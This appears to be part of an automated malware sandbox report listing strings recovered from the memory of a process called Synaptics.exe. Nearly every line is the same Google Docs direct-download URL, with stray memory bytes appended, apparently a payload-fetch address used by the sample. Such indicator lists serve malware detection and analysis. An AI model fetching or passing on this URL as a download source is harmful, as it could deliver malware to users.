                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadef
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeg
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelleB
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellej
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenet
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetl
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniy
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo8
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderco
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderu
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloades-fo
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfN
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfS
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadft:-
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg2
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4141841776.000000000F0D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgG
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgf
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgleco(
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoog
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgp-
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgroun
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh0
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh:15
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhE
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhd
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhe
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiI
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadia&
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadif&
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadih
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadisco
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaditT
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadity
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.0000000005660000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjR
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjg
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk9
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkL
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkk
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkwR
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlJ
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadld.
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleni
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadli
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlor:#
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlui
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmN
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmeasu:
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmiss
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmj
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadml
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmooof
                                Source: Synaptics.exe, 00000002.00000002.4085838285.0000000005660000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn-lis
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.neC
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnM
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnQ
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncellm
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadndica/
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnes
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnet.c
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetle
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnetlez
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnimu
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadniyo
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadno-r
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadno-st
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnts
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.2572800198.000000003BBB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado1
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle-b
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle.W
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogles
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogletU
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoid.cV
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom.
